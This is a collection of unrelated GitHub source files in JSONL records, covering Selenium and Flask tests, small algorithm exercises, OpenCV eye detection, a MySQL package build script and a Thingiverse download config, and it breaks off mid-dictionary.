+{"seq_id":"20090107496","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\n\n@pytest.fixture\ndef driver(request):\n wd = webdriver.Chrome() # Optional argument, if not specified will search path.\n# wd = webdriver.Ie()\n\n print(wd.capabilities)\n# wd.implicitly_wait(1)\n request.addfinalizer(wd.quit)\n return wd\n\ndef check_value(cur_val, expect_val):\n if cur_val == expect_val:\n return True\n else:\n return False\n\ndef compare_dicts(dict1, dict2):\n for key in dict1:\n if dict1[key] == dict2[key]:\n result = True\n else:\n result = False\n print(\"Не совпало значение с ожидаемым для свойства '\" + key + \"'\")\n\n return result\n\ndef check_dict(dict):\n for key in dict:\n if dict[key] == True:\n result = True\n else:\n result = False\n print(\"Не прошло проверку атрибут стиля '\" + key + \"'\")\n return result\n\ndef check_style_by_attribute(webdriver, locator, atr_value):\n attr = webdriver.find_element_by_css_selector(locator).get_attribute(\"class\")\n if attr == atr_value:\n return True\n else:\n return False\n\n\ndef get_el_product(webdriver, locator):\n element = webdriver.find_elements_by_css_selector(locator)\n return element[0]\n\ndef check_product_prop_and_styles(driver):\n dict_product_lst_props = {}\n dict_product_props = {}\n dict_el_style = {}\n\n# получение свойств и стилей продукта на главной странице\n product = get_el_product(driver, \"div#box-campaigns a.link\")\n dict_product_lst_props[\"prod_title\"] = product.get_attribute(\"title\")\n\n reg_pr_element = product.find_element_by_css_selector(\"s.regular-price\")\n dict_product_lst_props[\"reg_price\"] = reg_pr_element.get_attribute(\"textContent\")\n lst_reg_pr_color = reg_pr_element.value_of_css_property(\"color\")\n\n camp_pr_element = product.find_element_by_css_selector(\"strong.campaign-price\")\n dict_product_lst_props[\"campaign_price\"] = camp_pr_element.get_attribute(\"textContent\")\n lst_camp_pr_color = camp_pr_element.value_of_css_property(\"color\")\n\n# проверяем стиль цены на первой страницы\n dict_el_style[\"lst_s\"] = check_style_by_attribute(product, \"s\", \"regular-price\")\n dict_el_style[\"lst_strong\"] = check_style_by_attribute(product, \"strong\", \"campaign-price\")\n\n product.click()\n# проверяем появления заголовка страницы продукта\n WebDriverWait(driver, 10).until(lambda driver : driver.find_element_by_css_selector(\"div#box-product h1.title\"))\n\n# получение свойств и стилей продукта на странице выбранного продукта\n sel_product = get_el_product(driver, \"div#box-product h1.title\")\n dict_product_props[\"prod_title\"] = sel_product.get_attribute(\"textContent\")\n\n sel_reg_pr_element = get_el_product(driver,\"div.content s.regular-price\")\n dict_product_props[\"reg_price\"] = sel_reg_pr_element.get_attribute(\"textContent\")\n reg_pr_color = sel_reg_pr_element.value_of_css_property(\"color\")\n\n sel_camp_pr_element = get_el_product(driver,\"div.content strong.campaign-price\")\n dict_product_props[\"campaign_price\"] = sel_camp_pr_element.get_attribute(\"textContent\")\n camp_pr_color = sel_camp_pr_element.value_of_css_property(\"color\")\n\n# проверяем стиль цены на второй странице товара\n dict_el_style[\"pr_s\"] = check_style_by_attribute(driver, \"div.content s\", \"regular-price\")\n dict_el_style[\"pr_strong\"] = check_style_by_attribute(driver, \"div.price-wrapper strong\", \"campaign-price\")\n\n# проверяем совпадение цвета цены скидки\n dict_el_style[\"color\"] = check_value(lst_camp_pr_color, camp_pr_color)\n\n# driver.back()\n\n# проверяем совпадение атрибутов товара и стилей товара на 2-х страницах\n prop_result = compare_dicts(dict_product_lst_props, dict_product_props)\n style_res = check_dict(dict_el_style)\n\n assert prop_result == True\n assert style_res == True\n\ndef test_example(driver):\n driver.get('http://localhost/litecart/')\n check_product_prop_and_styles(driver)\n","repo_name":"kukushdi3981/sel-1_test-project","sub_path":"task10_check_product_property_and_styles.py","file_name":"task10_check_product_property_and_styles.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32196016724","text":"import heapq\n\nN = int(input())\ncards = [int(input()) for _ in range(N)]\nif len(cards) == 1:\n if cards[0] == 1: print(0)\n else: print(cards[0])\nelse:\n answer = 0\n heapq.heapify(cards)\n while cards:\n card1 = heapq.heappop(cards)\n card2 = heapq.heappop(cards)\n sum_val = card1 + card2\n answer += sum_val\n if len(cards): heapq.heappush(cards, sum_val)\n\n print(answer)","repo_name":"psj8532/problem_solving","sub_path":"BOJ/그리디/카드정렬하기.py","file_name":"카드정렬하기.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"40886825772","text":"def producto_escalar():\r\n # Obtener la longitud de los vectores del usuario\r\n n = int(input(\"Ingrese la longitud de los vectores: \"))\r\n\r\n # Inicializar los vectores con ceros\r\n vector_a = [0] * n\r\n vector_b = [0] * n\r\n\r\n # Solicitar al usuario ingresar los elementos de los vectores\r\n print(\"Ingrese los elementos del primer vector:\")\r\n for i in range(n):\r\n vector_a[i] = float(input(f\"Elemento {i + 1}: \"))\r\n\r\n print(\"Ingrese los elementos del segundo vector:\")\r\n for i in range(n):\r\n vector_b[i] = float(input(f\"Elemento {i + 1}: \"))\r\n\r\n # Calcular el producto escalar\r\n producto = sum(a * b for a, b in zip(vector_a, vector_b))\r\n\r\n # Mostrar el resultado\r\n print(f\"El producto escalar de los vectores es: {producto}\")\r\n\r\n# Llamar a la función\r\nproducto_escalar()\r\n","repo_name":"Luke231424234345/mc-lucas-porras-2023","sub_path":"Taller # 13.1.py","file_name":"Taller # 13.1.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28215478363","text":"#!/usr/bin/env python\n\n# Python 2/3 compatibility\nfrom __future__ import print_function\n\nimport numpy as np\nimport cv2\nimport glob, os.path, shutil, os, sys\n\nhelp_message = '''\nUSAGE: facedetect.py [--cascade ] [--nested-cascade ] []\n'''\n\ndef detect(img, cascade):\n rects = cascade.detectMultiScale(img, scaleFactor=1.3, minNeighbors=4, minSize=(20, 20), flags = cv2.CASCADE_SCALE_IMAGE)\n if len(rects) == 0:\n return rects\n rects[:,2:] += rects[:,:2]\n return rects\n\ndef draw_rects(img, rects, color):\n for x1, y1, x2, y2 in rects:\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)\n\ndef main():\n fd()\n\ndef fd():\n cascade_fn = 'haarcascade_eye_tree_eyeglasses.xml'\n\n cascade = cv2.CascadeClassifier(cascade_fn)\n\n for f in glob.glob(sys.argv[1]):\n if not os.path.isfile(f):\n continue\n img = cv2.imread(f)\n print('detecting %s' % f)\n #cv2.imshow('facedetect', img)\n #cv2.waitKey(-1)\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n gray = cv2.equalizeHist(gray)\n\n detected = detect(gray, cascade)\n if len(detected) != 0:\n print(\"%s contains face\" % (f))\n draw_rects(img, detected, (255, 0, 0, 255))\n cv2.imshow('img',img)\n cv2.waitKey(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"linzj/fetch_bbs_pic","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25641393249","text":"def main(y):\n print(\"Give me\",y,\"numbers\")\n r = int(input())\n numbers =[]\n while len(numbers) < y:\n numbers.append(r)\n if len(numbers) < y:\n r = int(input(\"Give me another number\"))\n print (numbers)\n #sum of the 10 numbers\n def function(x):\n name = x\n var = 0\n for i in numbers:\n var += i\n result = var/len(numbers)\n if name == 1:\n return var\n else:\n return result\n #Paul´s blog idea -->https://pololarinette.wordpress.com/2015/10/15/wsq10-lists/\n #Standar deviation\n import statistics\n statistics.stdev(numbers)\n\n print(\"The sum of the\",y,\"numbers is\",function(1))\n print(\"The average of the\",y,\"numbers is\",function(2))\n print(\"The stardart deviation is\",statistics.stdev(numbers))\nmain(10)#change the number if you want\n","repo_name":"Jocapear/TC1014","sub_path":"WSQ10.py","file_name":"WSQ10.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72938319832","text":"from Foundation import *\nfrom AppKit import *\n\nimport imp\n\nclass STEPluginExecutor(NSObject):\n\t@classmethod\n\tdef loadModuleAtPath_functionName_arguments_(self, path, func, args):\n\t\t\n\t\tf = open(path)\n\t\ttry:\n\t\t\tmod = imp.load_module('plugin', f, path, (\".py\", \"r\", imp.PY_SOURCE))\n\t\t\trealfunc = getattr(mod, func, None)\n\t\t\tif realfunc is not None:\n\t\t\t\trealfunc(*tuple(args))\n\t\texcept Exception as e:\n\t\t\tNSRunAlertPanel('Script Error', '%s' % e, None, None, None)\n\t\tfinally:\n\t\t\tf.close()\n\t\t\treturn NO\n\t\t\n\t\treturn YES\n","repo_name":"bignerdranch/ScriptableTextEditor","sub_path":"STEPluginExecutor.py","file_name":"STEPluginExecutor.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"5"} +{"seq_id":"15591356974","text":"import logging\nimport shutil\nfrom pathlib import Path\n\nimport ncempy.io as nio\nimport numpy as np\nfrom scipy import stats\nfrom skimage.exposure import rescale_intensity\nfrom tifffile import imwrite\n\ntile_conf_header = [\n \"# Define the number of dimensions we are working on\\n\",\n \"dim = 2\\n\",\n \"# Define the image coordinates (in pixels)\\n\",\n]\n\n\ndef get_files(input_dir, filename_filter, logger=logging):\n files = sorted(Path(input_dir).glob(filename_filter))\n logger.info(f\"Found {len(files)} files matching '{filename_filter}'.\")\n return files\n\n\ndef load_ser_file(ser_file, logger=logging):\n # read .ser file\n ser_data = nio.ser.serReader(ser_file)\n if \"metadata\" not in ser_data:\n logger.warning(f\"No metadata found for file {ser_file}. Returning empty dict.\")\n return {}, ser_data[\"data\"], ser_data[\"pixelSize\"]\n return ser_data[\"metadata\"], ser_data[\"data\"], ser_data[\"pixelSize\"]\n\n\ndef process_metadata(\n metadata_list,\n save_dir,\n prefixes=[],\n filename=\"TileConfiguration.txt\",\n logger=logging,\n):\n # assert save_dir exists\n assert Path(save_dir).exists(), f\"Output directory {save_dir} doesn't exist\"\n with open(Path(save_dir, filename), \"w\") as f:\n f.writelines(tile_conf_header)\n for meta in metadata_list:\n if \"Stage X [um]\" not in meta:\n logger.warning(f\"Skipping file {meta['image_file_name']}.\")\n continue\n # NB: x and y are flipped in the metadata, compared to the pixel data\n logger.info(f\"Processing file: {meta['image_file_name']}\")\n logger.info(\n f\"Metadata: {meta['Stage Y [um]'] / meta['pixel_size']} {meta['Stage X [um]'] / meta['pixel_size']}\"\n )\n f.write(\n f\"{meta['image_file_name']}; ; \"\n + f\"({meta['Stage Y [um]'] / meta['pixel_size']}, {meta['Stage X [um]'] / meta['pixel_size']})\\n\"\n )\n for p in prefixes:\n shutil.copy(Path(save_dir, filename), Path(save_dir, p))\n\n\ndef export_uint16(data, pixel_size, save_dir, basename, prefix=\"16bit\"):\n dest_dir = Path(save_dir) / prefix\n Path(dest_dir).mkdir(parents=True, exist_ok=True)\n dest_path = Path(dest_dir) / (basename + \".tif\")\n _write_image_with_calibration(dest_path, data, pixel_size)\n\n\ndef export_normalized_uint8(\n data, pixel_size, save_dir, basename, prefix=\"8bit\", intensity_range=500\n):\n dest_dir = Path(save_dir) / prefix\n Path(dest_dir).mkdir(parents=True, exist_ok=True)\n dest_path = Path(dest_dir) / (basename + \".tif\")\n mode = stats.mode(data.flatten(), keepdims=False)\n normalized = rescale_intensity(\n data,\n in_range=(mode[0] - intensity_range, mode[0] + intensity_range),\n out_range=np.uint8,\n )\n _write_image_with_calibration(dest_path, normalized, pixel_size)\n\n\ndef _write_image_with_calibration(dest_path, image, pixel_size):\n imwrite(\n dest_path,\n image,\n resolution=(\n 1.0 / (pixel_size[0] * 1000 * 1000),\n 1.0 / (pixel_size[1] * 1000 * 1000),\n ),\n imagej=True,\n metadata={\"unit\": \"um\"},\n )\n","repo_name":"fmi-faim/em-tasks","sub_path":"src/em_tasks/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26457334809","text":"from itertools import count\nfrom math import sqrt\n\n\ndef counting_rectangles(target):\n \"\"\"\n Returns the area of the rectangular grid with the nearest to target\n number of rectangles.\n \"\"\"\n mindiff = target\n bestarea = 0\n\n def rectangles(n, m):\n return int((n**2 + n) * (m**2 + m) / 4)\n \n for i in count(1):\n for j in count(int(sqrt(4*target/(i**2 + i)))):\n r = rectangles(i, j)\n if abs(target - r) < mindiff:\n mindiff = abs(target - r)\n bestarea = i * j\n if r > target:\n break\n if i**2 + i > target / 2:\n break\n return bestarea\n\n\ndef solve(vol=0):\n return counting_rectangles(2000000)\n","repo_name":"CaptainSora/Python-Project-Euler","sub_path":"PE085.py","file_name":"PE085.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38030271636","text":"from Utilities.config import app,db\nfrom Models.users import *\nfrom flask import request\n\n@app.route('/login',methods=['POST'])\ndef LoginUser():\n data=request.json\n result=verifyLogin(data)\n \n return result\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","repo_name":"deepak678/IOT_App_Backend","sub_path":"controller/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31932509611","text":"from solns.graph.graph import *\nimport unittest\nfrom parameterized import parameterized as p\nfrom solns.dfs.dfs import *\n\nclass UnitTest_Dfs(unittest.TestCase):\n G = Graph()\n G.addEdges(0,[1,2])\n G.addEdges(1,[0,3])\n G.addEdges(2,[0,4])\n G.addEdges(3,[1,5])\n G.addEdges(4,[2,5])\n G.addEdges(5,[3,4])\n @p.expand([\n [0,\"013542\"],[3,\"310245\"],[1,\"102453\"]\n ])\n def test_naive(self,s,expected):\n G = self.G.graph\n seq = Solution.naive(G,s,set(),\"\")\n self.assertEqual(seq,expected)\n","repo_name":"zcemycl/algoTest","sub_path":"py/tests/testDfs/test_Dfs.py","file_name":"test_Dfs.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"72992114072","text":"import math\nimport pdb\n\nfrom applicants.models import SkillHobby, Feature, JobApplication\n\ndef sigmoid(x):\n return 2 * (1 / (1 + math.pow(math.e, -x / 5)) - 0.5)\n\ndef magic_score(application):\n applicant_features = features(application)\n score = 0\n for applicant_feature in applicant_features:\n feature_model = Feature.objects.get(name=applicant_feature, department=application.job_listing.department)\n score += feature_model.weight\n return sigmoid(score);\n\ndef application_change(application):\n status = application.status\n change = 0\n if status == JobApplication.INTERVIEW_REQUESTED or status == JobApplication.OFFER_GIVEN:\n change = 0.01\n elif status == JobApplication.REJECTED:\n change = -0.01\n else:\n return\n\n applicant_features = features(application)\n\n for applicant_feature in applicant_features:\n change_weight(applicant_feature, change)\n\ndef change_weight(feature, change):\n # pdb.set_trace()\n weight = feature.weight + change\n\n weight = max(weight, 0)\n weight = min(weight, 3)\n\n feature.weight = weight\n feature.save()\n\ndef features(application):\n applicant_features = [];\n applicant = application.applicant\n department = application.job_listing.department\n\n for a_level in applicant.a_levels.all():\n applicant_features.append(Feature.objects.get_or_create(name=a_level.feature_description, department=department)[0])\n\n for degree in applicant.degree.all():\n applicant_features.append(Feature.objects.get_or_create(name=degree.feature_description, department=department)[0])\n\n for skill in applicant.skills_and_hobbies.filter(kind=SkillHobby.SKILL):\n # pdb.set_trace()\n applicant_features.append(Feature.objects.get_or_create(name=skill.feature_description, department=department)[0])\n\n for programming_language in applicant.skills_and_hobbies.filter(kind=SkillHobby.PROGRAMMING_LANGUAGE):\n applicant_features.append(Feature.objects.get_or_create(name=programming_language.feature_description, department=department)[0])\n\n for prior_employment in applicant.prior_employment.all():\n applicant_features.append(Feature.objects.get_or_create(name=prior_employment.feature_description, department=department)[0])\n\n return applicant_features\n","repo_name":"tomallton/Quikruit","sub_path":"quikruit/applicants/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72054834392","text":"\n\"\"\"\nAssignment: Users With Bank Accounts\n\nCreate a User class that has an association with the BankAccount class. You should not have to change anything in the BankAccount class.\n\nFor example, from the User class we should be able to deposit money into the user's account:\nBut our User class does not have a self.account_balance attribute. What it does have is an instance of a BankAccount by the name of self.account. That means that we'll be mirroring the methods created in the BankAccount class like make_deposit (and other methods referencing self.account_balance). But we'll be calling on the BankAccount class to do most of the work! That's the goal of this assignment, and you may find that you do not have to add much logic if any.\n\nRemember in our User methods, we can now access the BankAccount class through our self.account attribute, like so:\nclass User:\n def example_method(self):\n self.account.deposit(100)\t\t# we can call the BankAccount instance's methods\n print(self.account.balance)\t\t# or access its attributes\n\"\"\"\nclass User:\n def __init__(self, name,):\n self.name = name\n self.account = Bank_Account(int_rate=0.01, balance=0)\n\n def deposit(self, amount):\n self.account.deposit(amount)\n print(f\"Made Deposit {amount} to {self.name} account\")\n return self\n\n def withdraw(self, amount):\n self.account.withdraw(amount)\n print(f\"Withdrew ${amount} from {self.name} account\")\n return self\n \n def displayUserBalance(self):\n print(f\"Retrieving {self.name} balance\")\n print(f\"{self.name} Balance {self.account.balance}\")\n\nclass Bank_Account:\n def __init__(self, int_rate=0.01, balance=0):\n self.int_rate = int_rate\n self.balance = balance\n\n def deposit(self, amount):\n self.balance += amount\n return self\n\n def withdraw(self, amount):\n self.balance -= amount\n if self.balance < 0:\n print(\"Insufficient funds: Charging a $5 fee will deduct $5\")\n self.balance = self.balance - 5\n return self\n\n def displayAccountInfo(self):\n print(f\"Balance:{self.balance}\")\n\n def yieldInterest(self):\n if self.balance > 0:\n self.balance += self.balance * self.int_rate\n else:\n print(\"You have a negative account balance.\")\n return self\n\n\nRyan1 = User(\"Ryan\")\nKevin2 = User(\"Kevin\")\nMike3 = User(\"Mike\")\n\nprint(\"*\" * 40)\n\n\nRyan1.displayUserBalance()\nRyan1.deposit(5000).withdraw(500).withdraw(3000).deposit(2000).withdraw(200).displayUserBalance()\n\nprint(\"*\" * 40)\n\nKevin2.displayUserBalance()\nKevin2.deposit(50).withdraw(10).withdraw(10).deposit(10).withdraw(500).displayUserBalance()\n\nprint(\"*\" * 40)\n\nMike3.displayUserBalance()\nMike3.deposit(50000).withdraw(1000).withdraw(500).deposit(20000).withdraw(300).displayUserBalance()\n\n\n\n\n\n\n\n","repo_name":"rsayd/Users_With_Bank_Account.py","sub_path":"Users_With_Bank_Account.py","file_name":"Users_With_Bank_Account.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20471401642","text":"from urllib.request import Request, urlopen\n\nimport pytest\n\nfrom main import app\nfrom models.user import User\n\n\n@pytest.fixture\ndef client():\n client = app.test_client()\n\n cleanup() # clean up before every test\n\n # create User model and log it in\n # login is required for all handlers in this file\n success, user, message = User.create(email_address=\"testman@test.man\", password=\"test123\", admin=True)\n User._test_mark_email_verified(user=user)\n session_token = User.generate_session_token(user=user)\n client.set_cookie(server_name=\"localhost\", key=\"my-web-app-session\", value=session_token)\n\n yield client\n\n\ndef cleanup():\n # clean up/delete the database (reset Datastore)\n urlopen(Request(\"http://localhost:8002/reset\", data={})) # this sends an empty POST request\n\n\ndef test_admin_users_list_1(client):\n # only one user on the list (the admin)\n response = client.get('/admin/users')\n assert b'Active users' in response.data\n assert b'testman@test.man' in response.data\n assert b'Admin' in response.data\n\n\ndef test_admin_users_list_2(client):\n # create multiple users via Fake Data Loader\n client.get('/load-fake-data')\n\n # go to admin/users and see if users were created\n response = client.get('/admin/users')\n assert b'Active users' in response.data\n assert b'testman@test.man' in response.data\n assert b'Admin' in response.data\n\n assert b'Jim Jones' in response.data\n assert b'user_2@my.webapp' in response.data\n assert b'Load more users' in response.data # load more users button\n\n\ndef test_admin_user_details(client):\n user = User.get_user_by_email(email_address=\"testman@test.man\")\n\n response = client.get('/admin/user/{}'.format(user.get_id))\n\n assert b'testman@test.man' in response.data\n assert b'Admin' in response.data\n","repo_name":"JanVerderber/ninjatodo","sub_path":"tests/admin/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12518319709","text":"from pisi.actionsapi import autotools\nfrom pisi.actionsapi import libtools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\ndef setup():\n # Don't use zlib from source\n pisitools.removeDir(\"zlib\")\n pisitools.dosed(\"configure.in\", \"zlib/Makefile dnl\", \"dnl zlib/Makefile\")\n\n # Plain autoconf doesn't work here...\n shelltools.export(\"WANT_AUTOCONF\", \"2.59\")\n\n autotools.autoreconf(\"--force\")\n libtools.libtoolize(\"--copy --force\")\n libtools.gnuconfig_update()\n\n shelltools.cd(\"innobase/\")\n autotools.autoreconf(\"--force\")\n libtools.libtoolize(\"--copy --force\")\n libtools.gnuconfig_update()\n shelltools.cd(\"../\")\n \n # Export flags\n shelltools.export(\"CFLAGS\", \"%s -DHAVE_ERRNO_AS_DEFINE=1\" % get.CFLAGS())\n shelltools.export(\"CXXFLAGS\", \"%s \\\n -felide-constructors \\\n -fno-exceptions \\\n -fno-rtti\" % get.CXXFLAGS())\n\n # Configure!\n autotools.configure(\"--libexecdir=/usr/sbin \\\n --sysconfdir=/etc/mysql \\\n --localstatedir=/var/lib/mysql \\\n --with-low-memory \\\n --enable-assembler \\\n --enable-local-infile \\\n --with-mysqld-user=mysql \\\n --with-client-ldflags=-lstdc++ \\\n --enable-thread-safe-client \\\n --with-comment=\\\"Pardus Linux\\\" \\\n --with-unix-socket-path=/var/run/mysqld/mysqld.sock \\\n --with-zlib-dir=/usr \\\n --with-lib-ccflags=\\\"-fPIC\\\" \\\n --with-readline \\\n --enable-shared \\\n --enable-static \\\n --with-openssl \\\n --without-debug \\\n --without-bench \\\n --with-charset=utf8 \\\n --with-collation=utf8_general_ci \\\n --with-extra-charsets=all \\\n --with-berkeley-db=./bdb \\\n --with-big-tables\")\n\ndef build():\n autotools.make()\n\ndef install():\n autotools.rawInstall(\"DESTDIR=%s benchdir_root=\\\"/usr/share/mysql\\\"\" % get.installDIR())\n\n # Move libs to /usr/lib\n pisitools.domove(\"/usr/lib/mysql/libmysqlclient*.so*\", \"/usr/lib\")\n\n # Links to libs\n pisitools.dosym(\"../libmysqlclient.so\", \"/usr/lib/mysql/libmysqlclient.so\")\n pisitools.dosym(\"../libmysqlclient_r.so \", \"/usr/lib/mysql/libmysqlclient_r.so\")\n\n # Extra headers\n pisitools.insinto(\"/usr/include/mysql\", \"include/my_config.h\")\n pisitools.insinto(\"/usr/include/mysql\", \"include/my_dir.h\")\n\n # Links\n pisitools.dosym(\"mysqlcheck\", \"/usr/bin/mysqlanalyze\")\n pisitools.dosym(\"mysqlcheck\", \"/usr/bin/mysqlrepair\")\n pisitools.dosym(\"mysqlcheck\", \"/usr/bin/mysqloptimize\")\n\n # Cleanup\n pisitools.remove(\"/usr/bin/make*distribution\")\n pisitools.remove(\"/usr/share/mysql/make_*_distribution\")\n pisitools.remove(\"/usr/share/mysql/mysql.server\")\n pisitools.remove(\"/usr/share/mysql/binary-configur\")\n pisitools.remove(\"/usr/share/mysql/mysql-log-rotate\")\n pisitools.remove(\"/usr/share/mysql/postinstall\")\n pisitools.remove(\"/usr/share/mysql/preinstall\")\n pisitools.remove(\"/usr/share/mysql/mi_test*\")\n pisitools.remove(\"/usr/share/mysql/*.spec\")\n pisitools.remove(\"/usr/share/mysql/*.plist\")\n pisitools.remove(\"/usr/share/mysql/my-*.cnf\")\n\n # No perl\n for i in [\"mysqlhotcopy\", \"mysql_find_rows\", \"mysql_convert_table_format\",\n \"mysqld_multi\", \"mysqlaccess\", \"mysql_fix_extensions\",\n \"mysqldumpslow\", \"mysql_zap\", \"mysql_explain_log\", \"mysql_tableinfo\",\n \"mysql_setpermission\"]:\n pisitools.remove(\"/usr/bin/%s\" % i)\n pisitools.removeDir(\"/usr/share/mysql/sql-bench\")\n\n # No tests\n pisitools.removeDir(\"/usr/share/mysql/mysql-test\")\n\n # Config\n pisitools.insinto(\"/etc/mysql\", \"scripts/mysqlaccess.conf\")\n\n # Data dir\n pisitools.dodir(\"/var/lib/mysql\")\n\n # Logs\n pisitools.dodir(\"/var/log/mysql\")\n shelltools.touch(\"%s/var/log/mysql/mysql.log\" % get.installDIR())\n shelltools.touch(\"%s/var/log/mysql/mysql.err\" % get.installDIR())\n\n # Runtime data\n pisitools.dodir(\"/var/run/mysqld\")\n\n # Documents\n pisitools.dodoc(\"README\", \"COPYING\", \"ChangeLog\", \"EXCEPTIONS-CLIENT\", \"INSTALL-SOURCE\")\n pisitools.dohtml(\"Docs/*.html\")\n pisitools.dodoc(\"Docs/manual.txt,\" \"Docs/manual.ps\")\n pisitools.dodoc(\"support-files/my-*.cnf\")\n","repo_name":"pars-linux/pardus-1.0","sub_path":"server/mysql/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25287930031","text":"import os\n\n\nTHINGIVERSE_FLASK_PORT = 8080\nTHINGIVERSE_FLASK_WAIT_PRE = 3\nTHINGIVERSE_FLASK_WAIT_POST = 300\nTHINGIVERSE_FLASK_WAIT_ENABLE = False\nTHINGIVERSE_FLASK_ENDPOINT = '/download'\nTHINGIVERSE_API_NUMBER_PAGES = 1000\nTHINGIVERSE_API_PER_PAGE = 500\nTHINGIVERSE_API_CONCURRENCY = 10\nTHINGIVERSE_API_CONCURRENCY_DOWNLOAD = 50\nTHINGIVERSE_API_AUTH = 'https://www.thingiverse.com/login/oauth/authorize'\nTHINGIVERSE_API_TOKEN = 'https://www.thingiverse.com/login/oauth/access_token'\nTHINGIVERSE_API_DONE = 'https://asuarez.dev/3d-net/docs/images/done.jpeg'\nTHINGIVERSE_API_PACKAGE = 'https://api.thingiverse.com/things/{}/package-url'\nTHINGIVERSE_API_SEARCH = 'https://api.thingiverse.com/search/' \\\n '?page={}&per_page={}&sort=popular&category_id={}&type=things'\n\nDATASET_FOLDER = 'data'\nDATASET_FOLDER_DOWNLOADED = os.path.join(DATASET_FOLDER, 'downloaded')\nDATASET_FOLDER_STANDARDIZED = os.path.join(DATASET_FOLDER, 'standardized')\nDATASET_FOLDER_PREPROCESSED = os.path.join(DATASET_FOLDER, 'preprocessed')\nDATASET_FOLDER_WEIGHTS = os.path.join(DATASET_FOLDER, 'weights')\nDATASET_FOLDER_WEIGHTS_FINAL = 'weights'\nDATASET_SUB_FOLDER_TRAINING = 'training'\nDATASET_SUB_FOLDER_VALIDATION = 'validation'\nDATASET_CATEGORIES = {\n '3d__printer_accessories': {'category_id': 127, 'main_category': '3d'},\n '3d__printer_extruders': {'category_id': 152, 'main_category': '3d'},\n '3d__printer_parts': {'category_id': 128, 'main_category': '3d'},\n '3d__printers': {'category_id': 126, 'main_category': '3d'},\n '3d__printing_tests': {'category_id': 129, 'main_category': '3d'},\n 'art__2d': {'category_id': 144, 'main_category': 'art'},\n 'art__tools': {'category_id': 75, 'main_category': 'art'},\n 'art__coins_badges': {'category_id': 143, 'main_category': 'art'},\n 'art__interactive': {'category_id': 78, 'main_category': 'art'},\n 'art__math': {'category_id': 79, 'main_category': 'art'},\n 'art__scans_replicas': {'category_id': 145, 'main_category': 'art'},\n 'art__sculptures': {'category_id': 80, 'main_category': 'art'},\n 'art__signs_logos': {'category_id': 76, 'main_category': 'art'},\n 'fashion__accessories': {'category_id': 81, 'main_category': 'fashion'},\n 'fashion__bracelets': {'category_id': 82, 'main_category': 'fashion'},\n 'fashion__costume': {'category_id': 142, 'main_category': 'fashion'},\n 'fashion__earrings': {'category_id': 139, 'main_category': 'fashion'},\n 'fashion__glasses': {'category_id': 83, 'main_category': 'fashion'},\n 'fashion__jewelry': {'category_id': 84, 'main_category': 'fashion'},\n 'fashion__keychains': {'category_id': 130, 'main_category': 'fashion'},\n 'fashion__rings': {'category_id': 85, 'main_category': 'fashion'},\n 'gadgets__audio': {'category_id': 141, 'main_category': 'gadgets'},\n 'gadgets__camera': {'category_id': 86, 'main_category': 'gadgets'},\n 'gadgets__computer': {'category_id': 87, 'main_category': 'gadgets'},\n 'gadgets__mobile_phone': {'category_id': 88, 'main_category': 'gadgets'},\n 'gadgets__tablet': {'category_id': 90, 'main_category': 'gadgets'},\n 'gadgets__video_games': {'category_id': 91, 'main_category': 'gadgets'},\n 'hobby__automotive': {'category_id': 155, 'main_category': 'hobby'},\n 'hobby__diy': {'category_id': 93, 'main_category': 'hobby'},\n 'hobby__electronics': {'category_id': 92, 'main_category': 'hobby'},\n 'hobby__music': {'category_id': 94, 'main_category': 'hobby'},\n 'hobby__rc_vehicles': {'category_id': 95, 'main_category': 'hobby'},\n 'hobby__robotics': {'category_id': 96, 'main_category': 'hobby'},\n 'hobby__sport_outdoors': {'category_id': 140, 'main_category': 'hobby'},\n 'household__bathroom': {'category_id': 147, 'main_category': 'household'},\n 'household__containers': {'category_id': 146, 'main_category': 'household'},\n 'household__decor': {'category_id': 97, 'main_category': 'household'},\n 'household__supplies': {'category_id': 99, 'main_category': 'household'},\n 'household__kitchen_dining': 